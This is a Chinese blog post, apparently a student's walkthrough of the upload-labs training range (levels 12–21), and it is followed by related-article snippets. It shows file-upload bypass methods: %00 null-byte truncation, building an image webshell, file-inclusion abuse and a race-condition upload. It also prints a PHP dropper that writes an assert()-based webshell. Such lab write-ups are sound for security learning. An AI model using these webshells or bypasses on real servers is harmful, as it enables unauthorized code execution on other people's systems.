UploadLabs Less12-21

最新推荐文章于 2023-11-22 22:40:50 发布
最新推荐文章于 2023-11-22 22:40:50 发布
阅读量853 收藏
点赞数
分类专栏: Upload Labs 文章标签: php 开发语言 web安全 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45785324/article/details/126060239
版权

白名单绕过

Less-12-%00截断(GET路径)

失败-我的php版本高于5.3.29

%00截断条件

php版本小于5.3.29   修改php.ini的magic_quotes_gpc为OFF状态

GET保存路径%00截断-加%00把保存路径%00后面的截断

Less-13-%00截断(POST路径)

失败-我的bp无法将%00 url解码成口及我的php版本高于5.3.29

.POST保存路径%00进行url解码,变成口 

GET会自动解码,将空格变为%20

POST不会解码

%00右键

Less-14-图片木马

图片木马,png好点,得有文件包含路径漏洞才能用

制作图片马:copy web.png /b + shell.php /a webshell.png web.png

 也可以使用notepad++打开图片在最后加入木马

 http://127.0.0.1/upload-labs-master/include.php?file=upload/3620220726144603.png

Less-15-图片木马

得到图片信息,图片马

 与14关同样的手法

Less-16-图片木马

这个靶场出现bug,换一个靶场

 与14关同样的手法

Less-17-条件竞争

抓包

 

 开始攻击,换个浏览器不断访问

http://127.0.0.1/upload-labs-master/include.php?file=upload/webshell.png

Less-18-二次渲染-条件竞争

$is_upload = false;
$msg = null;

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = UPLOAD_PATH . '/' . $file_name;

    if(move_uploaded_file($temp_file, $upload_file)){
        if(in_array($file_ext,$ext_arr)){
             $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
             rename($upload_file, $img_path);
             $is_upload = true;
        }else{
            $msg = "只允许上传.jpg|.png|.gif类型文件!";
            unlink($upload_file);
        }
    }else{
        $msg = '上传出错!';
    }
}

创建x.php

<?php file_put_contents('shell.php','<?php @assert($_POST['x']);?>'); ?>

上传抓包

 访问127.0.0.1/upload-labs-master/upload/x.php,抓包

 都修改有效载荷

 

 

 两个同时攻击,目录出现shell.php成功

Less-19-图片马文件包含

可以用14关的做法,上传图片马配合文件包含漏洞

需要注意文件上传到upload的上一级目录下

 

Less-20-文件夹方式上传

文件夹方式上传- 在文件夹路径下改为upload-19.php/.

                                                            upload-19.php%00.jpg (%00解码)

 抓包修改文件夹路径

改为

上传成功

 Less-21-数组验证

$is_upload = false;
$msg = null;
if(!empty($_FILES['upload_file'])){
    //检查MIME
    $allow_type = array('image/jpeg','image/png','image/gif');
    if(!in_array($_FILES['upload_file']['type'],$allow_type)){
        $msg = "禁止上传该类型文件!";
    }else{
        //检查文件名
        $file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];
        if (!is_array($file)) {
            $file = explode('.', strtolower($file));
        }

        $ext = end($file);
        $allow_suffix = array('jpg','png','gif');
        if (!in_array($ext, $allow_suffix)) {
            $msg = "禁止上传该后缀文件!";
        }else{
            $file_name = reset($file) . '.' . $file[count($file) - 1];
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' .$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $msg = "文件上传成功!";
                $is_upload = true;
            } else {
                $msg = "文件上传失败!";
            }
        }
    }
}else{
    $msg = "请选择要上传的文件!";
}

xxx.php/.更保险抓包进行修改

 

xxx.php上传成功

 

 

xiao飞仔
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
upload-labs 思路总结 less 1-12
yukinorong的博客
08-16 1046
upload-labs笔记 less 1 上传漏洞的方法有很多。 本地配置好upload-labs之后,利用burpsuite无法抓包问题: 原理有可能是本地代理设置成了默认不抓包127.0.0.1。也有可能是无法抓本地回环数据包。具体原因不清楚,解决方式是将127.0.0.1改为自己的ip地址,ip地址可以用cmd ipconfig中查询。 方法一 本题用的是js函数,白名单模式过滤文件,所有在...
less12 函数
weixin_34301132的博客
06-13 103
less .x(1) { x:11 } .x(2) { y:22 } .x(@x:1) when (default()) {z:@x} //default()表示一直为真 body{ background: color("#f60"); width: convert(1s,ms); background: data-uri('arr.jpg'); } .div1{ .x(1...
less12-less20()
qq_36567469的博客
03-20 3996
总结 user_agent注入 referer注入 cookie注入 updatexml()报错注入 less12 用户名密码输入 a") or ("1"="1 得到一个账户Dumb、Dumb。 用户名密码处分别输入计算出行数 Dumb") and ("1"="1 Dumb") and 1=1 order by 2-- 输入 Dumb") and ("1"="2 Dumb") and 1=2 union select 1,2-- 输入 Dumb") and ("1"="2 Dumb") and 1
SQLI-LABS Less-11 到 Less-12
Web学习之路
03-22 231
联合注入
upload-labs 12(修改二进制00截断)
LuckySec
11-07 1240
题目 查看源码 分析,在红线标线处,可以发现,该代码使用POST方式传参,并且最后对文件名重新拼接命名 因此,可以通过%00进行截断 将原本截断的内容,改成红线标记处添加+号,由于POST传参不会自动解码,需要在Hex处修改二进制,+对应的是2b,将其改为00即可 验证 文件上传成功! ...
less-plugin-clean-css:使用clean-css对CSS进行后期处理和压缩
02-23
npm install -g less-plugin-clean-css 然后在命令行上 lessc file.less --clean-css="--s1 --advanced --compatibility=ie8" 见的可用命令选项-唯一的区别是advanced和rebase ,我们默认为false,因为它并不总是...
less-plugin-autoprefix:添加了由 autoprefixer 对 less 进行后处理的能力
05-29
npm install -g less-plugin-autoprefix 然后在命令行上, lessc file.less --autoprefix="browsers" 浏览器是由逗号分隔的列表。 程序化用法 var LessPluginAutoPrefix = require ( 'less-plugin-autoprefix' )...
less-plugin-lists:更少的ListArray操作
05-13
少插件列表 用于列表/数组操作的插件。...npm install -g less-plugin-lists 与lessc使用 lessc --lists file.less 有通过命令行Less编译器使用插件的更多详细信息,请参见Less文档中的相应部分。
弹性布局-less--综合案例
11-02
利用弹性布局和less制作网页,利用弹性布局和less制作网页,利用弹性布局和less制作网页,试错前行,越努力越幸运,希望可以和大家一起进步,如有不足,多多包涵!
less-loader:编译不到CSS
04-29
首先,您需要安装less less-loader : $ npm install less less-loader --save-dev 然后将加载程序添加到您的webpack配置中。 例如: webpack.config.js module . exports = { module : { rules : [ { test ...
SQLi-LABS Less-11&&Less-12
m0_64898960的博客
04-20 848
Less-11题目 使用bp抓包进行观察,得知这是POST注入 进行测试 猜字段数 获显示位 查数据库名 查表名 查列名 查列里面的内容 Less-12题目 Less-12具体做法和Less-11一样只不过闭合的姿势不一样而已 由bp抓包得知Less-12闭合的姿势是“ ") ” 然后按上面的步骤就好。 总结 从这里开始已经进入POST注入的专题 POST注入与GET注入 GET方式是在客户端通过URL提交数据,数据在URL中可以看到 POST方式的数据则放置在HTML HEADE
文件上传漏洞—%00截断,配合upload-labs-12和Burp Suite
qq_43660551的博客
11-08 2787
预备知识:在请求方法中,get方式会对url编码进行自动解码,但是post不会对url编码进行自动解码。所以,在数据包以post方式提交时,要先将url编码进行解码,然后再提交。 查看下本的源码。不难发现,本使用白名单,只允许上传jpg、png、gif格式的文件。 源码中move_upload_file将文件上传到img_path的路径中,而img_path路径是save_path加上随机数时间戳+ “.” + 后缀名。这里save_path可以在数据包中修改。 ...
upload-labs之第十二和十三
田田云逸的博客
10-28 2787
注意:在上一篇的最后有一个知识点没有提到的就是,00截断的利用条件。 需满足 php 版本<5.3.4 php.ini中的magic_quotes_gpc是off状态的。(至于为什么下面会进行演示) Pass12 打开第十二老规矩先看提示 提示跟上一一样是上传路径可控???怎么回事,难道两考的考点是一样的吗?赶紧看看源码 $is_upload = false;$msg = null;if(isset($_POST['submit'])){ $ext_arr = .
php version 5.3.29升级,将PHP从5.3.28升级到5.3.29时Nginx出现502错误
weixin_36477469的博客
03-24 161
今天将PHP从5.3.28升级到5.3.29,发现网站打不开了,提示”502 bad gateway”,访问静态资源可以,但访问任何PHP文件都会502。其实之前也发现这个问题,只是一直没找到解决办法,所以我一直将PHP保持在5.3.28版本。按照我以前的脾气,我什么软件都得要最新的稳定版,但PHP之类的软件是例外,因为版本高了,会导致很多程序不兼容,相对来说5.3兼容性算是最好的版本之一,当然5...
upload-labs12(基于白名单的%00截断绕过)通思路
最新发布
zyh1588的博客
11-22 817
小白回顾文件上传靶场第12
php 5.3.29 linux,linux下PHP5.3.3升级到php5.3.29教程
weixin_42320332的博客
03-13 159
PHP5.3.3升级到5.3.29一、安装环境系统:centos6.4 64位原Apache、PHP和Mysql使用yum安装二、安装准备上传软件包:php-5.3.29.tar.gz卸载php5.3.3:#cp /etc/php.ini /etc/php.inibak# yum remove php*安装编译需要的环境:#yum -y install httpd-devel mysql-deve...
php5.3.29 漏洞修复,php5.3.29频繁异常退出,导致访问php404
weixin_35735370的博客
03-23 376
系统版本:CentOS release 6.8 (Final)内核:2.6.32-696.10.2.el6.x86_64php版本:php5.3.29编译参数:‘./configure’ ‘–prefix=/www/server/php/build’ ‘–enable-fpm’ ‘–with-fpm-user=www’ ‘–with-fpm-group=www’ ‘–with-config-fil...
php 5.3.29 怎么开启debug_PHP代码审计之环境安装(一)
weixin_39702799的博客
02-03 143
闲来无事,想想写个“水文”,这两天天天渗透app和小程序,有些“枯燥”,想着写一个php代码审计的系列随笔,从环境搭建开始Ready0x01 下载工具php代码审计需要准备的工具•phpstudy•phpstrom 用途就不多说了,phpstrom比较好用,方便代码审计下断点以及跟进函数,phpstudy集成web服务以及mysql数据库也比较方便。0x02 安装cms,这个步骤比较简单...
upload-labs题解
syy
04-24 2068
该文件不允许上传--前端认证(在前端已经被拦截了,没有上传到后端,所以无法第一时间进行抓包) 查看源码 发现前端对文件类型进行了过滤 解决方法: 在本地客户端禁用js.(用户点击上传按钮(submit)后,会触发js事件--onsubmit='return checkfile()";) 通过浏览器审查元素对网页代码的查看,删除onsubmit事件 作者采用了第二种方法,删除后,复制图像信息进行访问。 上传成功: 二、pass-02(C.
less less-loader
02-06
less 是一种 CSS 预处理器,它允许使用变量、函数、嵌套等高级功能来编写 CSS 代码。less-loader 是 Webpack 的一个模块加载器,用于在 Webpack 中使用 less。它可以将 less 文件转换为 CSS 代码并加载到页面中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值